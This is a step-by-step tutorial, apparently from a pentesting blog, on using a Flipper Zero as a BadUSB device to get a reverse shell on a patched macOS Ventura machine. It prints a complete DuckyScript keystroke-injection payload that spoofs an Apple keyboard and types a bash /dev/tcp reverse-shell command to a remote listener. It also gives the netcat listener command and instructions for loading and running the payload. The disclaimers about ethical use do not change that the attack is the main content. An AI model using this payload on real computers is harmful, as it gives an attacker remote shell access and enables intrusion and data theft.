Using a Flipper Zero, a short 12-line DuckyScript text file, and a remote listener on my Ubuntu server I was able to gain a shell on my fully patched, up-to-date Ventura macOS computer.
In my lab environment, I use Flipper Zero as a pentesting device to test vulnerabilities in my servers and desktop systems.
The Flipper Zero is our preferred ethical hacking tool because it offers an endless number of available payloads, has an on-screen menu selection tool, and uses a progress display to provide feedback.
This article is an example of how to use the Flipper Zero as an Ethical Pentesting BadUSB device and how to avoid becoming a victim of such an exploit. Do not use this on computers that you do not own or have permission to use. This code does not make an effort to hide from Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), Network Detection Systems, Firewalls, or Anti-Virus (AV) software.
BadUSB Payloads
The Flipper Zero BadUSB as well as several other BadUSB devices use payloads written in DuckyScript. A simple scripting language for performing keystrokes resulting in a keyboard injection attack.
A good starting reference point for Duckyscript Payloads is the Official Hak5 website:
Let’s Write Some DuckyScript
You can use a ready-made script, or you can learn to write your own. We’ll show you how to exploit a reverse shell on a macOS computer in a simple step-by-step walkthrough.
Use your favorite text editor and enter the following text. The macOS has the TextEdit application installed by default, so we’ll use that.
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
For this walkthrough we don’t need to know a lot about DuckyScript, so we’ll go over the few commands that our script uses. There are really only six different commands that we use.
|
Command |
Description |
|---|---|
|
ID 05ac:021e Apple:Keyboard |
This line tells the macOS our Flipper Zero is really an Apple Keyboard. If you do not use this line, the macOS displays the Keyboard Setup Assistant dialog which will cause your script to fail. |
|
DELAY |
This command instructs the operating system to wait for a period of time. If we don’t use these delays, the script will run too fast and fail. |
|
GUI SPACE |
Presses the Apple Command key and the Space bar to open the ‘Spotlight Search’ window. |
|
STRING Terminal |
Enters the string ‘Terminal’ into the Spotlight Search window |
|
ENTER |
Presses the ENTER or Return key on your keyboard. After pressing the ENTER key, the macOS launches the Terminal window (/Applications/Utilities/Terminal) |
|
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 |
This command enters the text into the terminal window which establishes a connection to the Netcat server listening at 10.10.10.157 on Port 4444 |
Change the IP address at 10.10.10.157 and Port 4444 to your server’s IP address and port.
Save this file to your disk as rev_shell_macos.txt. There is no subdirectory organization under the badusb directory on the Flipper Zero so if you are using multiple payloads for different operating systems, use a naming convention that means something to you so you know what it does.
Installing the qflipper Application
If you haven’t installed the qflipper application yet, go to the Official Flipper Zero update page and select the installer for your operating system. The page is the firmware update page, but at the bottom are links to install the qflipper application.
https://flipperzero.one/update
https://flipperzero.one/update?embedable=true
Follow the instructions for your operating system to install the qflipper application.
Getting the Duckyscript Onto the Flipper Zero
Open the qflipper application and select the folder icon highlighted in red.
Select and double-click the SD Card icon to view the contents.
Locate and drag the rev_shell_macos.txt file we created earlier onto the badusb folder.
Remove the Flipper Zero from your computer when the file is done copying.
Waiting for a Reverse Shell
The Flipper Zero BadUSB is armed and ready to use. But first, we need to set up our remote listener on our server. On our Ubuntu server, start the Netcat listener with the following command:
$ nc -nlvp 4444
The breakdown of the command is listed in the following table. Again you don’t really need to know what’s going on using this command, other than it’s waiting for an incoming connection.
|
Command |
Description |
|---|---|
|
nc |
Netcat command |
|
-nlvp |
(n) no DNS resolution, (l) listen for incoming connection, (v) verbose output, (p) port |
|
4444 |
Port number to listen on |
Now that our Netcat listener is ready and waiting for an incoming connection, we can proceed with the Flipper Zero BadUSB attack.
Starting the BadUSB Reverse Shell
The hard part is done. The Flipper Zero BadUSB reverse_shell_macos.txt file is written, moved to the Flipper Zero, and the Netcat listener is waiting for a connection.
Locate the Bad USB menu and select the Run button. Do not connect your Flipper Zero to your computer just yet. The Flipper Zero will let you know when it’s time to connect your device.
Navigate to the DuckyScript file we copied in the previous step. If you don’t see this file then you copied it to the wrong directory or did not use the .txt filename extension. Select rev_shell_macos and click the Run button.
When you see the Connect to USB alert, you can connect your Flipper Zero to your iMac or MacBook’s USB port. Click the Run button.
You can watch the progress of your BadUSB script in the main window. Once the status reaches 100% the payload is complete and you can remove the Flipper Zero.
If you are watching the iMac’s computer’s monitor you can see the exploit as it executes the DuckyScript. The Netcat listener on our Ubuntu server displays the results of the successful request.
Control of your Computer
You now have control of the macOS computer through a reverse shell. Running on a version of BSD Linux, you can use Unix command line tools and a BASH shell as if you were sitting at the physical iMac’s keyboard.
You can use regular Linux commands like whoami, pwd, ls, or cd to navigate the filesystem and manipulate the operating system.
Next Steps
Now that you have an understanding of how the Flipper Zero operates as a BadUSB device you can create your own scripts. Use the Hak5 site or one of the many DuckyScript GitHub repositories available through a Google search as a starting point for your own Duckyscript files.
Operate legally and ethically. Use this tool on devices that you own or have permission to use.